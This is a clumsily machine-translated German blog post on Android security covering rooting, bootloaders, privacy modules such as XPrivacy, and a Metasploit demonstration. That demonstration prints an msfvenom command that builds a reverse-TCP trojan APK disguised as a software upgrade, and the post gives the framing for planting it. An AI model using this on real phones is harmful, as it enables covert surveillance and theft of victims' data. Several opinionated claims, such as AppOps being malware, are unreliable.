Bildquelle: pixabay.com

Einführung in Android

In diesem Thema lernen wir Android und Open Source Security (OS) kennen. Android ist eine Open Source Plattform. Es ist Linux sehr ähnlich, aber immer noch viel zu verschieden von Linux. Linux ist im Vergleich zu Android viel zu ausgereift. Das ist also Chetan Nayak und willkommen zu meinem nächsten Blog über Open Source Web Security. Ich habe diesen Blog unter der Annahme geschrieben, dass die meisten von uns Android K, dh Kitkat oder Android L, dh Lollipop, verwenden würden.

Der Grund dafür war, dass Gingerbread und Jellybean viele Open-Source-Sicherheitsprobleme hatten, die ich in diesem einzigen Blog nicht diskutieren kann. Vielleicht werde ich es das nächste Mal besprechen, wenn ich tiefer in die älteren Versionen von Android eintauche. Bleiben wir also ab sofort bei KitKat und Lollipop.

Android wurde unter Berücksichtigung der Entwickler entwickelt. Sicherheitskontrollen sollten die Entwickler entlasten. Sicherheitsbewusste Entwickler können problemlos mit flexiblen Sicherheitskontrollen arbeiten und sich darauf verlassen. Entwickler, die mit Sicherheit weniger vertraut sind, werden durch sichere Standardeinstellungen geschützt.

Der Anfang

Ich war erst im späteren Quartal 2013 mit Android beschäftigt, als ich mein erstes Android-Handy hatte, das Sony Xperia L (auf Basis von 4.2.2). Heck, ich hasste sogar Android, der Grund dafür war, dass es extrem lahm war, vor allem Samsung-Geräte. Ich habe damals sogar darüber nachgedacht, ein Windows Lumia zu kaufen, aber glücklicherweise habe ich viele Spiele gespielt, und ich musste Xperia L kaufen, da diese Zelle Lag Proof war. Es hatte etwa 1 Gig RAM und Adreno 305. Cool genug, um alles laufen zu lassen.

Nachdem ich viele Spiele wie NOVA3 und ModernCombat4 gespielt hatte, langweilte ich mich innerhalb eines Monats von dieser Zelle. Ich wusste, dass Android auf Linux basiert, und ich wollte einige meiner Änderungen daran vornehmen. Ich fing an, über Anpassungen zu lesen und lernte, was als "Rooting" bezeichnet wurde. Da ich unter Linux eine gute Rückhand hatte, war das Rooten für mich kein Problem. Mit etwas Hilfe von XDA konnte ich meine Zelle erfolgreich rooten.

Aber dann ist mir etwas aufgefallen. Sobald meine Zelle nach dem Root-Vorgang neu gestartet wurde, hat sie gerade mit dem Boot-Loop begonnen (bleibt für immer auf dem Boot-Bildschirm hängen). Ich wusste nicht einmal, welcher Bootloader in Android war. Ich konnte also nichts tun. Es dauerte nur einen Monat, bis ich meine neue Zelle gekauft hatte, und meine Zelle war jetzt aus weichen Ziegeln. Ich habe immer gelesen, dass das Wurzeln gefährlich ist, aber ich wusste nicht, dass es meine Zelle beschädigen würde. Aber ich habe mich getäuscht. Als ich immer wieder ein paar Sachen über das Rooten las, wurde mir klar, dass das Rooten Ihr Telefon nicht ruiniert.

Das Rooting ähnelt dem Administratorzugriff auf einem Computer. (Eigentlich handelt es sich um einen Systemzugriff, aber ich habe den Administratorzugriff geschrieben, damit er für Anfänger leicht verständlich ist.) Das bedeutet, dass das Rooten Ihr Telefon niemals blockiert. Es war der Bootloader, der mein Telefon zugemauert hat. Für Leute die den Bootloader nicht kennen ist; Der Bootloader ähnelt dem BIOS in Windows. (Wenn Sie nicht wissen, was BIOS ist, sollten Sie nicht einmal darüber nachdenken, was Sicherheit ist.) Bootloader oder Hboot (so wird es in Android genannt) sind das erste, was ausgeführt wird, wenn Sie Ihr Android starten Gerät.

Es enthält die Anweisungen zum Booten des Betriebssystemkerns. Die meisten dieser Befehle sind speziell für die Ausführung einer eigenen Debug- oder Änderungsumgebung konzipiert.

Der Sicherheitskontrollpunkt von Android

Stellen Sie sich den Bootloader als Sicherheitskontrollpunkt Ihres Geräts vor. Wenn Sie diesen Kontrollpunkt durchbrechen, verlieren Sie alles, was Sie auf Ihrem Telefon haben. Es ist also ein gutes Sicherheitsmerkmal, das ich sage. Wenn Sie Ihr Telefon verlieren und jemand versucht, Root-Zugriff zu erlangen, um die Sperre zu umgehen (vorausgesetzt, Sie haben Ihr Gerät mit einer PIN oder einem Kennwort gesperrt), muss er den Bootloader zwangsweise entsperren, wodurch Ihre Daten gelöscht werden am Telefon.

Sie müssen sich also keine Sorgen machen, dass jemand es missbraucht. Ähnlich verhält es sich mit benutzerdefinierten ROMs. ROMs sind Betriebssysteme, die auf Android-Versionen basieren, die speziell für Ihre Hardwarearchitektur entwickelt wurden. Wenn Sie XDA für Ihr Telefon aktivieren, verfügen Sie über eine Reihe von benutzerdefinierten ROMs für Ihr Telefon. Einige der bekanntesten sind Cyanogen Mod-ROMs, die bereits vorinstalliert sind und vordefinierte Anpassungen enthalten .

Die Sicherheitskontrolle von Android

Möglicherweise denken Sie ab sofort, dass Sie ein sicheres Mobiltelefon haben. Aber ich bin hier, um dir wieder das Gegenteil zu beweisen, und das ist der springende Punkt dieses Blogs. Im zweiten Quartal 2014 hatten die Entwickler bereits begonnen, Exploits und Rootkits für Android zu entwickeln, mit denen Sie Ihre Handys rooten können, ohne auch nur die Bootloader freizuschalten.

Nicht gruselig genug? Lassen Sie mich Ihnen den gefährlichsten Teil erzählen. Sie könnten sogar Trojaner darin installieren. Selbst wenn die Polizei die Zelle aufspüren könnte und Sie sogar Ihre Zelle zurückbekommen, besteht immer noch ein hohes Risiko, dass sie alles sieht, was Sie auf Ihrem Telefon tun. Dies habe ich als Experiment in einer tatsächlichen praktischen Umgebung versucht.

Ich habe Metasploit für diesen Angriff verwendet. Ich habe einen Trojaner erstellt und auf dem Zieltelefon installiert. Es war eine einfache APK-Datei, und ich nannte sie ein Software-Upgrade. Wenn der Benutzer also nur ein gewöhnlicher Mensch ist, der nur wenige Informationen über Sicherheit hat, wird er es nicht einmal wagen, diese zu entfernen. Und ich habe sichergestellt, dass sich die von mir erstellte Malware bei jeder Aktivierung des Internets automatisch selbst ausführt und sich wieder mit meinem Remote-Port auf dem Host-Computer verbindet.

Die folgenden Befehle wurden für den Angriff verwendet (Metasploit ist eine Penetrationstestsoftware, mit der Schwachstellen auf einer Plattform oder auf bestimmten Geräten überprüft werden können.)

Meine Host-IP-Adresse: 192.168.xx.xx

Mein Host-Port (zum Herstellen einer Verbindung): 445

>>>msfvenom

>>> msfvenom android / meterpreter / reverse_tcp LHOST = 192.168.xx.xx LPORT = 445> SoftwareUpgrade.apk

Also habe ich hier einen Reverse-TCP-Kanal auf meinem Computer erstellt. Jedes Mal, wenn das Internet auf dem Android gestartet wird, wird auf meinem Kali-Computer oder dem Computer, auf dem ich Metasploit installiert habe, eine Shell geöffnet.

Jetzt wissen Sie, wie beängstigend es für eine Person ist, die Sie noch nicht einmal kennen. Sie hat Aufzeichnungen über jede Transaktion, die Sie über Ihr Handy tätigen, über jeden anderen Kontakt, WhatsApp-Nachrichten, SMS-, Viber- und Skype-Anruflisten und alles. Wenn das nicht beängstigend ist, dann weiß ich nicht, was ist.

Empfohlene Kurse

  • Zertifizierungskurs in Ruby Debugging
  • Schließe den PHP MySQL Kurs ab
  • Online-Zertifizierungskurs in VB.NET-Programmierung
  • Online-Kurs zu ITIL Foundation

Die Berichterstattung

Genug über Sicherheitsprobleme. Wir alle wissen, dass jede andere Plattform Sicherheitsprobleme hat. Wie könnten wir dann sicher sein? Das ist nicht genau richtig. Plattformen können bis zu einem bestimmten Punkt sicher gemacht werden, aber danach müssen wir sicherstellen, dass dies auch so bleibt. In der Welt der Sicherheit gibt es ein berüchtigtes Zitat:

„Social Engineering: Weil es keinen Patch für menschliche Dummheit gibt“

Ich habe diesen Satz vor langer Zeit gehört, als ich eine Konferenz von DefCon gesehen habe.

Wenn es keine technische Schwachstelle gibt, die ausgenutzt werden kann, sollten Sie versuchen, Menschen zu hacken. Und damit meine ich nicht Hypnose und so. Ich meine Social Engineering. Weitere Informationen hierzu finden Sie in meinem anderen Blog „Bedeutung der Cybersicherheit in unserem täglichen Leben“.

Kernsicherheitsfunktion von Android

Außerdem Social Engineering, für das nur gesorgt werden kann, wenn Sie schlau sind. Es gibt Möglichkeiten, wie Sie Android-Anwendungen auf sichere Weise entwickeln können, um sicherzustellen, dass dies auch so bleibt.

Im Folgenden finden Sie einige der wichtigsten Sicherheitsfunktionen, mit denen Sie sichere Apps erstellen können:

  • Die Sandbox für Android-Anwendungen, die Ihre App-Daten und die Codeausführung von anderen Apps isoliert.
  • Ein Anwendungsframework mit zuverlässigen Implementierungen allgemeiner Sicherheitsfunktionen wie Kryptografie, Berechtigungen und sicherem IPC.
  • Ein verschlüsseltes Dateisystem, das aktiviert werden kann, um Daten auf verlorenen oder gestohlenen Geräten zu schützen.
  • Vom Benutzer erteilte Berechtigungen zum Einschränken des Zugriffs auf Systemfunktionen und Benutzerdaten.
  • Anwendungsdefinierte Berechtigungen zum Steuern von Anwendungsdaten auf App-Basis.

Was können Sie tun, wenn Sie eine sichere Umgebung wünschen, aber kein Entwickler sind?

Ab Android 5, dh Lollipop, bietet es eine Funktion, mit der der Benutzer mehrere Profile und eingeschränkte Modi hinzufügen kann, um Telefone und Tablets zu verwenden. Wenn Sie Ihr Telefon gerootet haben, gibt es auch Android-Apps in Xposed-Modulen wie AppOps, Xprivacy oder Privacy Guard, mit denen Sie sich um fast alles kümmern können. Dazu müssen Sie das Xposed Framework installieren.

Xposed Framework ermöglicht die Arbeit mit Xposed-Modulen. Mit Xposed-Modulen können Sie das Verhalten von Apk- und Systemdateien ändern, ohne ein anderes ROM installieren zu müssen. Es ist auch einfach, die Änderungen rückgängig zu machen, sodass hier nur ein geringes Risiko besteht und es nicht einmal zeitaufwändig ist, da nicht mehrere ROMs, Kernel und ihre Fehlerbehebungen geflasht werden müssen.

Xprivacy, Privacy Guard und AppOps sind Module von Exposed, mit denen Sie Ihr Android-Gerät sicher machen können, indem Sie auswählen, welche App Zugriff auf das Internet, die Tastatur, die SD-Karte, den Root-Zugriff und viele andere Dinge haben soll. Sie können sogar den Zugriff auf bestimmte Dienste deaktivieren und benutzerdefinierte Vorlagen dafür erstellen. Ich ziehe es vor, Xprivacy zu wählen. Aber hier sind ein paar Infos oder Unterschiede, wenn Sie anfangen, sich zu unterscheiden, um zwischen den obigen drei zu wählen.

AppOps:

Dies wurde ursprünglich von Google in Android 4.3 eingeführt. (Dies ist der Hauptgrund, warum ich es nicht unterstütze. Ich vertraue Google nicht. Nenne es Paranoia, aber google verfolgt alles, was Sie tun. Und ich brauche niemanden, der den Überblick über alles behält, was ich tue, aber wenn Sie Google vertrauen, Tue es.). Die Haupteinschränkung von AppOps besteht darin, dass Sie bei Google nur den Zugriff auf die Apps blockieren können, die Sie blockieren möchten.

Dies bedeutet, dass Sie nicht in der Lage sind, Apps zu blockieren, die mit Google in Verbindung stehen, z. B. Play Services (die tatsächlich mehr als 50% Ihres normalen Speichers, Akkus und Ihrer Daten (Internet) verbrauchen). Dies ist ein weiterer Grund für mich, Google zu hassen. Daher glaube ich, dass AppOps für mich nichts anderes als eine Malware ist. (Aber das denke ich nur so. Es ist nicht so, wenn Sie Google von ganzem Herzen vertrauen.)

Privacy Guard:

Privacy Guard ist eine benutzerfreundliche Oberfläche, die als Ersatz für AppOps von Cyanogen Mod entwickelt wurde. Wenn Sie ein Anfänger sind, empfehle ich Ihnen, dies zu verwenden, da es nur einen Ein- und Ausschaltknopf und selbstdefinierte Vorlagen gibt, welche Art von App auf was zugreifen soll. Dies ist nicht so sicher, wenn es eine Malware gibt, die sich wie eine System-App verhält oder als solche ausgibt. Aber es ist gut, Sie anzufangen.

Xprivacy:

Xprivacy ist ein All-in-One-Tool. Es richtet sich aber an Experten. Sie können es mit einem Schweizer Taschenmesser vergleichen. Es enthält alles und kann Ihr Telefon auf jede andere Weise sicher machen. Wenn Sie jedoch nicht wissen, was Sie tun, wird Ihr Telefon nur durcheinander gebracht und Apps werden nicht mehr gestartet. Sie können den Zugriff auf System-Apps auch einschränken. Diesen wähle ich persönlich am liebsten.

Neben den oben genannten Modulen gibt es in Xposed noch weitere Module wie Lightening Firewall oder BootManager, mit denen der Zugriff auf das Internet für bestimmte Apps eingeschränkt und das Starten von Apps beim Neustart eines Telefons neben dem System verhindert werden kann.

Also, das wäre es für diesen Blog. Im Falle von Sicherheitsbedenken können Sie sicher die XDA-Website besuchen oder Mitglied dieser werden, wodurch Sie viel mehr Informationen zum Datenschutz erhalten.

Empfohlene Artikel:-

Dies war eine Anleitung für Android. Hier haben wir das Grundkonzept, die Sicherheitskontrollpunkte und die zentrale Sicherheitsfunktion von Android besprochen. Sie können auch unsere anderen Artikelvorschläge durchgehen, um mehr zu erfahren -

  1. Android Interview Questions - Top 10 nützliche Frage
  2. 8 nützliche Siri-Alternativen für Android
  3. 28 Beste Tipps und Tricks für Android Apps-Entwicklungstools
  4. Karriere in der Android-Entwicklung